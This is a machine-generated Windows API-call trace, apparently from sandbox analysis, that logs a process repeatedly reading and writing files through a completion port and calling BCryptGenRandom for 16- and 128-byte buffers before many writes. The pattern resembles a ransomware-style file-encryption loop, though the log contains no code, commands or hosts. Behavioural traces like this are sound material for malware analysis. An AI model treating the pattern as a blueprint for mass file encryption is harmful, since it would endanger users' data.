[0147.575] ReadFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x7d6e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0147.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.603] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0147.603] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.603] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0147.604] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.604] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.604] free (_Block=0x3e305b8) [0147.604] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.604] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.604] free (_Block=0x1fa91d0) [0147.604] free (_Block=0x1fa2ed8) [0147.605] free (_Block=0x1fa90b8) [0147.605] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0147.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0147.620] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.620] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.620] free (_Block=0x3e305b8) [0147.620] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.620] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.620] free (_Block=0x1fa91d0) [0147.620] free (_Block=0x1fa2ed8) [0147.620] free (_Block=0x1fa90b8) [0147.620] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.633] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.634] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0147.634] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.634] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0147.635] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.635] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.635] free (_Block=0x3e305b8) [0147.635] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.635] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.635] free (_Block=0x1fa91d0) [0147.635] free (_Block=0x1fa2ed8) [0147.635] free (_Block=0x1fa90b8) [0147.635] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.636] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.644] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.645] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0147.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0147.646] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.646] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.647] free (_Block=0x3e305b8) [0147.647] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.647] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.647] free (_Block=0x1fa91d0) [0147.647] free (_Block=0x1fa2ed8) [0147.647] free (_Block=0x1fa90b8) [0147.647] WriteFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.647] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0151.980] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x53a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0151.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.010] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x2740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0152.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0152.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0152.018] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.018] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.018] free (_Block=0x3e305b8) [0152.018] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.018] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.018] free (_Block=0x1fa91d0) [0152.018] free (_Block=0x1fa2ed8) [0152.018] free (_Block=0x1fa90b8) [0152.018] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.031] CloseHandle (hObject=0xec) returned 1 [0152.031] free (_Block=0x3d70450) [0152.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.032] CloseHandle (hObject=0x3cc) returned 1 [0152.032] free (_Block=0x3e70008) [0152.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.032] CloseHandle (hObject=0x338) returned 1 [0152.032] free (_Block=0x3f70048) [0152.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.116] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4c0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.118] CloseHandle (hObject=0x170) returned 1 [0152.118] free (_Block=0x3df0008) [0152.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.143] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x25cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.157] CloseHandle (hObject=0x308) returned 1 [0152.157] free (_Block=0x3df0008) [0152.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.180] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x80c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0152.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.195] CloseHandle (hObject=0x338) returned 1 [0152.195] free (_Block=0x3d70450) [0152.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0152.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0152.205] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.205] free (_Block=0x3e305b8) [0152.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.205] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.206] free (_Block=0x1fa91d0) [0152.206] free (_Block=0x1fa2ed8) [0152.206] free (_Block=0x1fa90b8) [0152.206] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.213] CloseHandle (hObject=0x3cc) returned 1 [0152.213] free (_Block=0x3e70008) [0152.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.220] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7cb6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0152.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.238] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xaefa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.269] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2d6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.289] CloseHandle (hObject=0x170) returned 1 [0152.290] free (_Block=0x3df0008) [0152.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.293] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1f50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.657] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x15f2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0152.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0152.679] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.679] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.679] free (_Block=0x3e305b8) [0152.679] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.679] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.680] free (_Block=0x1fa91d0) [0152.680] free (_Block=0x1fa2ed8) [0152.680] free (_Block=0x1fa90b8) [0152.680] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0152.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.698] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xa790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0152.712] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xa488, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0152.723] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.017] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0153.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.028] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.028] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.028] free (_Block=0x3e305b8) [0153.028] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.028] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.028] free (_Block=0x1fa91d0) [0153.028] free (_Block=0x1fa2ed8) [0153.028] free (_Block=0x1fa90b8) [0153.028] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.029] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0153.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.200] CloseHandle (hObject=0x308) returned 1 [0153.200] free (_Block=0x1ff1e60) [0153.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.212] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0153.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.224] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x312c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.225] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: 